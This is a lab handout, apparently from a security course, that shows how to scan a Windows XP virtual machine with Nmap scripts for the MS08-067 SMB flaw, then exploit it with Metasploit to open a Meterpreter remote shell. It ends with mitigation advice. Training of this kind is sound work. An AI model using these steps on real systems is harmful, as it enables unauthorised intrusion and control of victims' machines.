Lab 5 - Using The Nmap Scripting Engine (NSE) and Metasploit To Exploit Windows XP
Lab 5 - Using The Nmap Scripting Engine (NSE) and Metasploit To Exploit Windows XP
Lab 5 - Using The Nmap Scripting Engine (NSE) and Metasploit To Exploit Windows XP
1. One VM of Kali
2. One VM of Windows XP SP2 (Lab 2a)
Nmap is one of the few tools that every hacker should be conversant in. Although it is not
perfect, it is excellent for active reconnaissance. Although I discourage the use of Windows for
hacking, Nmap does have a version for Windows with a nice GUI called Zenmap.
The Nmap scripting engine is one of Nmap's most powerful and, at the same time, most flexible
features. It allows users to write their own scripts and share these scripts with other users for the
purposes of networking, reconnaissance, etc. These scripts can be used for:
Network discovery
More sophisticated and accurate OS version detection
Vulnerability detection
Backdoor detection
Vulnerability exploitation
In this Lab, we will look at the scripts that have been shared and are built into Kali and how to
use them to do thorough recon on our target to increase the probability of success.
As you can see in the screenshot above, our terminal displays hundreds of Nmap scripts.
Among the most useful to us are the vulnerability scanning scripts. These scripts are usually
designed to find a specific vulnerability or type of vulnerability that we can then come back later
and exploit. To locate those scripts that we can use for vulnerability scanning, we can type:
1. Ensure the Windows XP Virtual Machine is up and running. You will need the IP address of
your victim to run this script. Think back to Lab 3, what Nmap commands could you use to foot
print and discover the IP of your Windows XP victim? You can also get the IP by logging on to
the victim and running IPCONFIG from a command prompt.
Try running the SMB vulnerability checking script against your Windows XP victim.
Now, when I run the command, I get much more useful results.
As you can see, it tells me that MS08-067 is vulnerable, so now I know I can use that module in
Metasploit to exploit that system!
We need to know the difference between an exploit and a payload. The exploit is the flaw in the
system that you are going to take advantage of. In the case of MS08-067, it is a problem is the
SMB service. When we search for modules within Metasploit, we are simply looking for
exploits. From the Metasploit command line, we can find a specific exploit by using the search
command “search ms08″ or whatever exploit you want.
A payload is what we send to the victim once we execute the exploit. Different payloads for
different exploits.
Stop! This is my IP address, not yours! Your Windows XP IP address will differ.
Again, the RHOST is the remote machine or the machine we are attacking. To set this, I’ll enter
“set RHOST 192.168.225.134″ at the exploit prompt.
You also need to set the LHOST or the Local Host IP address. If you don’t know what the IP
address is of your Kali machine, type ifconfig at the exploit prompt.
We want to take over the machine and have our way with it, and nothing says hackfest like a
remote shell connection with a victim. To get this remote shell, we will use one the most popular
payloads found in Metasploit called Meterpreter.
Meterpreter is a very powerful payload with plenty of options, but the most popular is the ability
to establish a remote shell with the victim.
We prefer the remote shell because it gives a complete run of the remote machine as if we were
physically sitting at the keyboard.
All that is left to do is launch the payload in the direction of the victim. To do this, we use the
exploit command.
Success! We now have a remote shell running on our victim. Earlier in the lab, we ran the
IPCONFIG command on our windows XP victim. To do so we had to get access to the machine
physically. We can now bring up a command prompt and run the IPCONFIG command using the
remote shell.
At the meterpreter prompt, type shell. The prompt changes to the command prompt on our
victim machine. Type IPCONFIG.
Summary
This lab picked up where the previous Nmap lab left off. Once we identified the victim and we
identified the victim as being Windows XP, we check the victim for the MS08-067vulnerability.
Once we confirmed the vulnerability did exist, we searched for an exploit for MS08-067 inside
of Metasploit. We then launched the Meterpreter payload and established a remote shell to the
victim.
Having a firewall enabled, patching windows XP and ensuring our virus scanner is up to date
would have prevented this exploit from running.
End of Lab!